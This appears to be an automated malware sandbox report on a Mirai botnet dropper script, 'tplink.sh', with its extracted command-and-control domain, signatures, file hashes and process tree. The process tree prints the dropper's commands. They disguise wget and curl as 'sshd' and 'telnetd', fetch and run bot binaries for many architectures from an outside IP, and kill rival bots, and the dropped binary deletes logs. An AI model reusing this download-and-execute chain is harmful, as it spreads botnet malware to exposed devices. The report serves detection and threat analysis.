Overview

overview

10

Static

static

1

tplink.sh

ubuntu-18.04-amd64

10

tplink.sh

debian-9-armhf

10

tplink.sh

debian-9-mips

10

tplink.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    134s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    21-08-2024 17:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tplink.sh

  • Size

    827B

  • MD5

    503a6790064c0d8afb7220d7ff4d559d

  • SHA1

    c00a805062e7a6274dde96063d42065ba2286085

  • SHA256

    f495ac84e4181503f0e6e4e21728a0cb82c7e9a3f6e1e54741f6eaf589aea82e

  • SHA512

    6c7ab7e8cf0b5b07b1c9cae94e4631e3fab493366d80d9946ba75a11897d8dfe658dcd96fd26d04c3b85a87786aa0656293e331a2b436b018547634c0dd45e37

Score
10/10
miraibotnetevasion

Malware Config

Extracted

Family

mirai

C2

really.idoingitagain.space

Extracted

Family

mirai

C2

really.idoingitagain.space

Extracted

Family

mirai

C2

really.idoingitagain.space

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Deletes Audit logs 1 TTPs 1 IoCs

    Deletes logs related to the Linux Audit framework.

    evasion
  • Deletes system logs 1 TTPs 1 IoCs

    Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

    evasion
  • Executes dropped EXE 24 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Deletes log files 1 TTPs 1 IoCs

    Deletes log files on the system.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 1 IoCs
  • Reads CPU attributes 1 TTPs 18 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/tplink.sh
    /tmp/tplink.sh
    1⤵
      PID:710
      • /bin/cp
        cp -p /usr/bin/pkill httpd
        2⤵
        • Writes file to tmp directory
        PID:715
      • /bin/cp
        cp -p /usr/bin/wget sshd
        2⤵
        • Writes file to tmp directory
        PID:719
      • /bin/cp
        cp -p /usr/bin/curl telnetd
        2⤵
        • Writes file to tmp directory
        PID:724
      • /bin/chmod
        chmod +x httpd
        2⤵
          PID:726
        • /bin/chmod
          chmod 777 httpd
          2⤵
            PID:728
          • /bin/chmod
            chmod +x sshd
            2⤵
              PID:730
            • /bin/chmod
              chmod 777 sshd
              2⤵
                PID:732
              • /bin/chmod
                chmod +x telnetd
                2⤵
                  PID:734
                • /bin/chmod
                  chmod 777 telnetd
                  2⤵
                    PID:736
                  • /usr/bin/pkill
                    pkill -f bot.x86
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:738
                  • /tmp/httpd
                    ./httpd -f bot.x86
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:740
                  • /usr/bin/pkill
                    pkill -f bot.arm4
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:742
                  • /tmp/httpd
                    ./httpd -f bot.arm4
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:744
                  • /usr/bin/pkill
                    pkill -f bot.arm5
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:746
                  • /tmp/httpd
                    ./httpd -f bot.arm5
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:749
                  • /usr/bin/pkill
                    pkill -f bot.arm6
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:750
                  • /tmp/httpd
                    ./httpd -f bot.arm6
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:751
                  • /usr/bin/pkill
                    pkill -f bot.arm7
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:753
                  • /tmp/httpd
                    ./httpd -f bot.arm7
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:754
                  • /usr/bin/pkill
                    pkill -f x86
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:756
                  • /tmp/httpd
                    ./httpd -f x86
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:757
                  • /usr/bin/pkill
                    pkill -f arm5
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:758
                  • /tmp/httpd
                    ./httpd -f arm5
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:759
                  • /usr/bin/pkill
                    pkill -f arm6
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:760
                  • /tmp/httpd
                    ./httpd -f arm6
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:761
                  • /usr/bin/pkill
                    pkill -f arm7
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:762
                  • /tmp/httpd
                    ./httpd -f arm7
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:763
                  • /tmp/sshd
                    ./sshd http://45.66.231.129/xd_/cyber-x86
                    2⤵
                    • Executes dropped EXE
                    • Writes file to tmp directory
                    PID:764
                  • /bin/chmod
                    chmod 777 cyber-x86
                    2⤵
                      PID:765
                    • /bin/chmod
                      chmod +x cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                      2⤵
                        PID:766
                      • /tmp/cyber-x86
                        ./cyber-x86 tplink-x86
                        2⤵
                        • Executes dropped EXE
                        PID:767
                      • /tmp/sshd
                        ./sshd http://45.66.231.129/xd_/cyber-sh4
                        2⤵
                        • Executes dropped EXE
                        • Writes file to tmp directory
                        PID:769
                      • /bin/chmod
                        chmod 777 cyber-sh4
                        2⤵
                          PID:770
                        • /bin/chmod
                          chmod +x cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                          2⤵
                            PID:771
                          • /tmp/cyber-sh4
                            ./cyber-sh4 tplink-sh4
                            2⤵
                            • Executes dropped EXE
                            PID:772
                          • /tmp/sshd
                            ./sshd http://45.66.231.129/xd_/cyber-ppc
                            2⤵
                            • Executes dropped EXE
                            • Writes file to tmp directory
                            PID:774
                          • /bin/chmod
                            chmod 777 cyber-ppc
                            2⤵
                              PID:775
                            • /bin/chmod
                              chmod +x cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                              2⤵
                                PID:776
                              • /tmp/cyber-ppc
                                ./cyber-ppc tplink-ppc
                                2⤵
                                • Executes dropped EXE
                                PID:777
                              • /tmp/sshd
                                ./sshd http://45.66.231.129/xd_/cyber-mpsl
                                2⤵
                                • Executes dropped EXE
                                • Writes file to tmp directory
                                PID:779
                              • /bin/chmod
                                chmod 777 cyber-mpsl
                                2⤵
                                  PID:780
                                • /bin/chmod
                                  chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                                  2⤵
                                    PID:781
                                  • /tmp/cyber-mpsl
                                    ./cyber-mpsl tplink-mpsl
                                    2⤵
                                    • Executes dropped EXE
                                    PID:782
                                  • /tmp/sshd
                                    ./sshd http://45.66.231.129/xd_/cyber-mips
                                    2⤵
                                    • Executes dropped EXE
                                    • Writes file to tmp directory
                                    PID:784
                                  • /bin/chmod
                                    chmod 777 cyber-mips
                                    2⤵
                                      PID:785
                                    • /bin/chmod
                                      chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                                      2⤵
                                        PID:787
                                      • /tmp/cyber-mips
                                        ./cyber-mips tplink-mips
                                        2⤵
                                        • Deletes Audit logs
                                        • Deletes system logs
                                        • Executes dropped EXE
                                        • Modifies Watchdog functionality
                                        • Deletes log files
                                        • Changes its process name
                                        PID:788
                                      • /tmp/sshd
                                        ./sshd http://45.66.231.129/xd_/cyber-m68k
                                        2⤵
                                        • Executes dropped EXE
                                        • Writes file to tmp directory
                                        PID:791
                                      • /bin/chmod
                                        chmod 777 cyber-m68k
                                        2⤵
                                          PID:797
                                        • /bin/chmod
                                          chmod +x cyber-m68k
                                          2⤵
                                            PID:798
                                          • /bin/chmod
                                            chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                                            2⤵
                                              PID:800
                                            • /tmp/cyber-m68k
                                              ./cyber-m68k tplink-m68k
                                              2⤵
                                                PID:801
                                              • /tmp/sshd
                                                ./sshd http://45.66.231.129/xd_/cyber-arm7
                                                2⤵
                                                • Executes dropped EXE
                                                • Writes file to tmp directory
                                                PID:803
                                              • /bin/chmod
                                                chmod 777 cyber-arm7
                                                2⤵
                                                  PID:811
                                                • /bin/chmod
                                                  chmod +x cyber-arm7
                                                  2⤵
                                                    PID:813
                                                  • /bin/chmod
                                                    chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                                                    2⤵
                                                      PID:815
                                                    • /tmp/cyber-arm7
                                                      ./cyber-arm7 tplink-arm7
                                                      2⤵
                                                        PID:816
                                                      • /tmp/sshd
                                                        ./sshd http://45.66.231.129/xd_/cyber-arm6
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Writes file to tmp directory
                                                        PID:818
                                                      • /bin/chmod
                                                        chmod 777 cyber-arm6
                                                        2⤵
                                                          PID:826
                                                        • /bin/chmod
                                                          chmod +x cyber-arm6
                                                          2⤵
                                                            PID:828
                                                          • /bin/chmod
                                                            chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                                                            2⤵
                                                              PID:829
                                                            • /tmp/cyber-arm6
                                                              ./cyber-arm6 tplink-arm6
                                                              2⤵
                                                                PID:830
                                                              • /tmp/sshd
                                                                ./sshd http://45.66.231.129/xd_/cyber-arm5
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Writes file to tmp directory
                                                                PID:832
                                                              • /bin/chmod
                                                                chmod 777 cyber-arm5
                                                                2⤵
                                                                  PID:842
                                                                • /bin/chmod
                                                                  chmod +x cyber-arm5
                                                                  2⤵
                                                                    PID:845
                                                                  • /bin/chmod
                                                                    chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                                                                    2⤵
                                                                      PID:846
                                                                    • /tmp/cyber-arm5
                                                                      ./cyber-arm5 tplink-arm5
                                                                      2⤵
                                                                        PID:848
                                                                      • /tmp/sshd
                                                                        ./sshd http://45.66.231.129/xd_/cyber-arm4
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Writes file to tmp directory
                                                                        PID:849
                                                                      • /bin/chmod
                                                                        chmod 777 cyber-arm4
                                                                        2⤵
                                                                          PID:856
                                                                        • /bin/chmod
                                                                          chmod +x cyber-arm4
                                                                          2⤵
                                                                            PID:857
                                                                          • /bin/chmod
                                                                            chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
                                                                            2⤵
                                                                              PID:858
                                                                            • /tmp/cyber-arm4
                                                                              ./cyber-arm4 tplink-arm4
                                                                              2⤵
                                                                                PID:859

                                                                            Network

                                                                            MITRE ATT&CK Enterprise v15

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • /tmp/cyber-mips
                                                                              Filesize

                                                                              95KB

                                                                              MD5

                                                                              f74e3ea702aac682cea4e7e5c11767df

                                                                              SHA1

                                                                              fe9c9ada37285e03bd3d3a74b115acf59e55928d

                                                                              SHA256

                                                                              182c153838ebbc0d5191b7bbf97c993d84456c414fff04dd4b7bfe32f00cbd3b

                                                                              SHA512

                                                                              7b954686f1b0e16ea73d5ffd6a5626d41d2f5a4c43b91f1270f1d0c55d7e534b7989dc5af2ee81e92c004e916cea7c147a43704e934a12bc6199e6b4dcce1af6

                                                                              Download Submit

                                                                            • /tmp/cyber-mpsl
                                                                              Filesize

                                                                              97KB

                                                                              MD5

                                                                              605c719579681c44f640587ff4dc6db2

                                                                              SHA1

                                                                              b2d17a8d7dd094a6c2d87f993e130383e94e16de

                                                                              SHA256

                                                                              34e3196effc44c3fea00cd70a38c3d4ba747255911b6be2a2c9ef09a47168c47

                                                                              SHA512

                                                                              cb9ff093b9061180d9f6294e80560000fd7fd36b54521ddf5763dc10a399deeaeb0aa0461807b2034562280f8d98a44f41cb7e4368c5ac78a1d8390345840ac7

                                                                              Download Submit

                                                                            • /tmp/cyber-ppc
                                                                              Filesize

                                                                              65KB

                                                                              MD5

                                                                              cc543d4df9e33766e382e50ebfdad980

                                                                              SHA1

                                                                              8a46b3f78f375cf06b9610be58fafe89c61969b2

                                                                              SHA256

                                                                              40bcd636db4a86441b44b9c20ce3d759ddef4a18c168945b53df951edf0b3d42

                                                                              SHA512

                                                                              38ed37e68e99dbb8658dd1f3823e27baef01206b40ec5d0a6a71fd21ff173566b81666a593c8e3a1ccb8c7851bf74bdd11339410200e0508ce69d5ac39352d08

                                                                              Download Submit

                                                                            • /tmp/cyber-sh4
                                                                              Filesize

                                                                              51KB

                                                                              MD5

                                                                              666096845b3b27722b9d9629ddff12c1

                                                                              SHA1

                                                                              0bed897edd6422c3cfb24b0db44a2c87227e4e6e

                                                                              SHA256

                                                                              dd38e661acad7a79affb7b8b0abe2eb634bfd04c338afd5f7bd93a34aa16dd31

                                                                              SHA512

                                                                              229c4c1dda0224b90d6c827c2d63c6a3d90453e5358e38ffaa06c9f3f49d4cfd6e2464a86d69b9a6b06350b003d95a5d7c0312329bb1a51eb9956c12b8052789

                                                                              Download Submit

                                                                            • /tmp/cyber-x86
                                                                              Filesize

                                                                              61KB

                                                                              MD5

                                                                              3d574d6a4916704b337d76226d205abd

                                                                              SHA1

                                                                              80021cc1fc609bde17db484e58dece6a247ee11d

                                                                              SHA256

                                                                              df0f2131b26054328c7ae7428b6cc4d05967dfd334126a99d26660335c02eb0d

                                                                              SHA512

                                                                              e5a843ba13eeb9d83fd0a5b3d34cecfa449e6f9ba77cea1b8867b0fbf91c2d4bbc14f6e8cd27b5550622781b8b29ae0ac952c4ab4e7e4eb5f174a1fd2e24d5a9

                                                                              Download Submit

                                                                            • /tmp/httpd
                                                                              Filesize

                                                                              26KB

                                                                              MD5

                                                                              d9addfdd64ccedc9640f9734d8b9a0a7

                                                                              SHA1

                                                                              29f5c2d0a7156c66d85d90db035216b13677c807

                                                                              SHA256

                                                                              238bd4df1c42427726bcc0f923fa0cffe73c732c38aceab5f73feb056e8da40c

                                                                              SHA512

                                                                              527cc35790cbd883cd385e15cf44cb65d3ec1998cb709d2e7088d462f609767428edb0efa6e3f1cda6b9f8a9d9abf05db722597b7e864d4c14b6477f053084ba

                                                                              Download Submit

                                                                            • /tmp/sshd
                                                                              Filesize

                                                                              536KB

                                                                              MD5

                                                                              7bb64131b781b7fe42df16e951677c42

                                                                              SHA1

                                                                              b975e340d8aa1fade395322a2ce1d84ec8e8fdc3

                                                                              SHA256

                                                                              fc6db07a0e096020bb4023351df4819d74992e0148c939582ef3f83e73e56b58

                                                                              SHA512

                                                                              544f0b7ff535ff129be1b51e545a4e991b928d7388f9024f9c33582951980f62171f06cb7f89f03ab080d0f60a3530365ca9b98ff1ad56b984ccf58cfb59aee0

                                                                              Download Submit

                                                                            • /tmp/telnetd
                                                                              Filesize

                                                                              186KB

                                                                              MD5

                                                                              e045e492b033a4f0e2168aaa509f5fd5

                                                                              SHA1

                                                                              4e2b28d07da66205e6a5875a3579f4c2bd18d4cc

                                                                              SHA256

                                                                              226c62fcbf25743a88180b10072e6b3c96dc6b08559a96ea0a67cdb94b3d15ca

                                                                              SHA512

                                                                              22dce34af0f4270709c72d8a7557f15939a72ab73d574f4bb8f295ca7e1907e3a42846a31092c34a147c58aa1a2dd05bb2d0656bdcffbc8a5ee5b6d9e82b0074

                                                                              Download Submit